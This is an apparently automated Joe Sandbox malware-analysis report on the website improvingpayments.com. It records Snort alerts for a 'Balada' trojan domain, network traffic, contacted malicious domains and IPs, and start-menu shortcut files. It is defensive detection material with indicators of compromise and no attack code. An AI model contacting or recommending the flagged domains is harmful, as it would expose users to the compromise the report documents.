Edit tour

Windows Analysis Report
http://improvingpayments.com

Overview

General Information

Sample URL:	http://improvingpayments.com
Analysis ID:	1430580

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 1824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://improvingpayments.com/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 3484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1972,i,17185468046542733416,17312511181297517858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) - Source IP: 192.168.2.17 - Destination IP: 1.1.1.1

Timestamp:	04/23/24-22:27:34.601771
SID:	2051948
Source Port:	53108
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) - Source IP: 192.168.2.17 - Destination IP: 1.1.1.1

Timestamp:	04/23/24-22:27:34.601436
SID:	2051948
Source Port:	59885
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) - Source IP: 192.168.2.17 - Destination IP: 193.163.7.113

Timestamp:	04/23/24-22:27:34.933406
SID:	2051949
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: https://improvingpayments.com/

HTTP Parser: No <meta name="author".. found

Source: https://improvingpayments.com/

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.157.11:443 -> 192.168.2.17:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49771 version: TLS 1.2

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.17:59885 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2051948 ET CURRENT_EVENTS Balada Domain in DNS Lookup (bestresulttostart .com) 192.168.2.17:53108 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2051949 ET CURRENT_EVENTS Balada Domain in TLS SNI (bestresulttostart .com) 192.168.2.17:49733 -> 193.163.7.113:443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93

Source: unknown

DNS traffic detected: queries for: improvingpayments.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.157.11:443 -> 192.168.2.17:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49771 version: TLS 1.2

Source: classification engine

Classification label: mal48.win@15/50@15/138

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://improvingpayments.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1972,i,17185468046542733416,17312511181297517858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1972,i,17185468046542733416,17312511181297517858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
http://improvingpayments.com	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
improvingpayments.com	160.153.0.14	true	false	unknown
visit.startfinishthis.com	172.67.152.194	true	false	unknown
www.google.com	64.233.185.104	true	false	high
bind.bestresulttostart.com	193.163.7.113	true	true	unknown
improving.patriotcbdguide.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://improvingpayments.com/	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	true
142.250.105.94	unknown	United States	15169	GOOGLEUS	false
142.250.105.84	unknown	United States	15169	GOOGLEUS	false
172.67.152.194	visit.startfinishthis.com	United States	13335	CLOUDFLARENETUS	false
142.250.105.139	unknown	United States	15169	GOOGLEUS	false
173.194.219.94	unknown	United States	15169	GOOGLEUS	false
193.163.7.113	bind.bestresulttostart.com	Denmark	1935	FR-RENATER-LIMOUSINReseauRegionalLimousinEU	true
172.253.124.95	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.9.95	unknown	United States	15169	GOOGLEUS	false
64.233.176.101	unknown	United States	15169	GOOGLEUS	false
160.153.0.14	improvingpayments.com	United States	21501	GODADDY-AMSDE	false
74.125.138.94	unknown	United States	15169	GOOGLEUS	false
64.233.185.104	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.17

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430580
Start date and time:	2024-04-23 22:27:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	http://improvingpayments.com
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.win@15/50@15/138

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe
Excluded IPs from analysis (whitelisted): 74.125.138.94, 142.250.105.139, 142.250.105.138, 142.250.105.101, 142.250.105.100, 142.250.105.102, 142.250.105.113, 142.250.105.84, 34.104.35.123, 142.250.9.95, 142.250.105.94, 172.253.124.95, 142.251.15.95, 64.233.185.95, 142.250.105.95, 74.125.138.95, 172.217.215.95, 173.194.219.95, 108.177.122.95, 64.233.177.95, 64.233.176.95
Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, fonts.gstatic.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: http://improvingpayments.com

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 19:27:33 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9901291207614644
Encrypted:	false
SSDEEP:
MD5:	68A53969366D96AE7B32253524DBA08A
SHA1:	A9E2B743BB33F6528387EA9A061AFA0122D7E7D2
SHA-256:	7B5D5A587CD1014A979A1DC46B843F31FA847191C5BA0D78644BA79F0ACF9854
SHA-512:	C0CA622AAD9FCB6205387EC24F2AC51D91BA382BC9E6730C5E3522621FF87C6FF9A80EF1188423C36E7D06802285191BAC1B386C6EDACE230F7441C054BF321E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Ej.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xj.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xp.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xp.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xp............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xq............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............j.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 19:27:33 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.008058362676881
Encrypted:	false
SSDEEP:
MD5:	6BB0AE5D7541EC6078627EBAB609BE95
SHA1:	F6551BDDB8590FC833AB43FA8ACEAE8DD79D2CED
SHA-256:	F637BBD9A7B116F081E4887C177B52C55D7467238FFDD204BD950758D0E2E003
SHA-512:	4AEB11C30D7FBFA2371A6DE92D3F23373EEF3C08F05AA933ABC1FC22701CF08A4526D08BAAC697B276E3C8E6263D010F4FA9F4E8875C7924917870CD19D240A7
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....^^.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xj.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xp.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Xp.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Xp............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Xq............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............j.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.015830148484902
Encrypted:	false
SSDEEP:
MD5:	95A2791896F4CB41FF88B343C2CB99FD
SHA1:	950953731D5FEC2F1074F323330FCB1877CC180D
SHA-256:	8454FE6235FC24C4A7C0589B51557CF06C05A192A43CE3E34ACEEFBDF3AE55BC
SHA-512:	AD979736A71EC4DC3952FD946A60AB2C51F163942889D74EB09715D40A4B43EAEDA0330E16EEF9C0C4F47D1BD2461F5B00D0B3ABB2939422BA79373E0C7408C6
Malicious:	false
Reputation:	unknown
